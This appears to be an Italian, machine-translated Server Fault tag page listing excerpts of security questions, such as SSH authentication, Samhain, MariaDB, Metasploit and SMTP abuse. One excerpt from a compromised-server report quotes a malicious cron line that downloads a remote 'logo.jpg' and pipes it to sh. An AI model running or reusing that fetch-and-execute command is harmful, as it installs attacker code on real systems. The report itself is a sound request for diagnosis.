Amministratori del server security

2

Come posso impostare i metodi di autenticazione per utente OpenSSH?

Mi piacerebbe avere un set di utenti che eseguono l'autenticazione utilizzando l'autenticazione con chiave pubblica e altri utenti per utilizzare l'autenticazione con password. È possibile in OpenSSH su Linux? In tal caso, come posso procedere? Dopo aver esaminato /etc/ssh/sshd_config, sembra che mi sia limitato a abilitare l'autenticazione con chiave o …

9 linux security ssh

1

Samhain può monitorare un file che non esiste, ma potrebbe in futuro?

Vorrei che Samhain monitorasse un file, per esempio /root/somefile,. Questo file non esiste attualmente, ma vorrei essere avvisato se viene creato in qualsiasi momento. Aggiungo questo a samhainrc: [ReadOnly] file = /root/somefile Questo fa sì che Samhain emetta queste voci di registro: Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] …

8 linux security intrusion-detection

1

Indirizzare utenti specifici o unità organizzative a controller di dominio specifici per l'autenticazione di accesso

Ho circa 200 utenti. 50 sono in Asia, 50 nell'Europa meridionale e orientale e circa 100 nell'Europa occidentale. Vorrei segnalare i 50 utenti che si trovano in Asia al nostro controller di dominio in Asia, e attualmente sembra che si stanno autenticando sui nostri server europei, causando un enorme ritardo …

8 windows windows-server-2008 active-directory security

3

Attacco di script Shell sul server Apache, tramite un cron di origine sconosciuta

Durante l'esecuzione di una guerra di progetto sul server Tomcat Apache ho scoperto che il server è stato compromesso. Mentre si esegue la guerra su uno sconosciuto cronsi corre così [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * …

8 linux shell security tomcat

1

Soluzione semplice per ricevere notifiche quando compaiono determinati eventi nei registri di Windows [chiuso]

Chiuso. Questa domanda è fuori tema . Al momento non accetta risposte. Vuoi migliorare questa domanda? Aggiorna la domanda in modo che sia in argomento per Server Fault. Chiuso 3 anni fa . Qual è il modo più semplice per ricevere una notifica quando vengono visualizzati eventi specifici nei registri …

8 security windows-event-log

2

La password dell'amministratore di MariaDb non sembra funzionare

Ho appena installato MariaDbsu un nuovo Ubuntu Gnome e successivamente ho eseguito mysql_secure_installation dove ho impostato una password amministratore decente, ho rimosso l'utente anonimo ecc. Successivamente ho realizzato alcuni strani comportamenti riguardanti la password dell'amministratore: Se provo ad accedere dal mio normale account utente usando il comando visualizzo mysql -u …

8 security mariadb authorization

2

Metasploit: cache del database del modulo non ancora creata, utilizzando la ricerca lenta

Un nuovo metasploit su kalilinux 2016 (ultima scuderia) systemctl start postgresql OK Su msfconsole msf > db_status [*] postgresql connected to msf Quando avvio la ricerca msf > search samba [!] Module database cache not built yet, using slow search Quindi ricostruisco la cache ... msf > db_rebuild_cache E quando …

8 linux security

2

Perché dovresti disabilitare l'accesso alla rete per gli account locali?

Questa domanda è in riferimento al thread Twitter di @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Dopo aver letto il thread, non riesco ancora a capire perché dovresti disabilitare l'accesso alla rete per gli account locali. Quindi ecco cosa sto pensando, per favore correggimi dove sbaglio: Supponiamo che abbia un annuncio configurato con un …

8 windows active-directory security group-policy windows-server-2012-r2

2

Come configurare un aggregatore di log per autenticare i dati?

Contesto : l'aggregazione dei registri remoti è considerata un modo per migliorare la sicurezza. In generale, ciò affronta il rischio che un utente malintenzionato che compromette un sistema possa modificare o eliminare i registri per frustrare l'analisi forense. Ho cercato opzioni di sicurezza in strumenti di registro comuni. Ma qualcosa …

8 security logging rsyslog logstash syslog-ng

1

È una cattiva idea interrompere l'esecuzione di servizi non necessari

Ho un server dedicato debian. Sto cercando di proteggerlo e un modo che ho pensato sarebbe buono è quello di chiudere i servizi che non mi servono, come ad esempio FTP. Sto suggerendo di eseguire qualcosa di simile al momento della distribuzione: service ntp stop update-rc.d -f ntp remove service …

8 linux security debian

3

Prezzi di coppie chiave e gruppi di sicurezza su AWS?

Il mio account AWS gratuito è scaduto. Ho eliminato tutte le risorse S3 ed EC2, ma sto vagando se posso lasciare il Key Pairse Security Groupssenza dover pagare per loro. (Le risorse del mio account ora appaiono così: Risorse ) La documentazione di Amazon non sembra menzionare questo problema. Queste …

8 security amazon-ec2 amazon-web-services amazon-s3 resources

3

Devo acquistare un secondo certificato con caratteri jolly per un sottodominio?

Abbiamo già un certificato jolly per *.mycompany.com. La nostra rete ha host raggiungibili solo internamente. Tutti appartengono al internal.mycompany.comsottodominio. Esiste un server privato con il nome host server.internal.mycompany.comsu cui ho distribuito il nostro certificato con caratteri jolly. Quando visito il server Web ricevo un errore di mancata corrispondenza del nome …

8 security ssl-certificate subdomain domain

1

Shell con restrizioni per la gestione di file e repository git

Pensa a una società di web hosting che vuole consentire agli utenti di gestire file e repository git tramite ssh. Ciò comprende: copia protetta (scp) creazione, copia, spostamento / ridenominazione ed eliminazione di file eseguire un ristretto sottoinsieme di comandi per il controllo del codice sorgente e l'editing del testo …

8 linux security

2

/ dev / shm & / proc indurimento

Ho visto menzionare la protezione di / dev / shm e / proc e mi chiedevo come lo fai e cosa consiste nel fare? Presumo che ciò implichi la modifica di /etc/sysctl.conf in qualche modo corretta. Come questi? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux security kernel

2

Trattare con un attacco di comando non valido SMTP

Uno dei nostri server di posta semi-occupati (sendmail) ha avuto molte connessioni in entrata negli ultimi giorni da host che stanno emettendo comandi spazzatura. Negli ultimi due giorni: connessioni smtp in entrata con comandi non validi da 39.000 IP univoci gli IP provengono da varie gamme in tutto il mondo, …

8 linux security smtp sendmail

Domande taggate «security»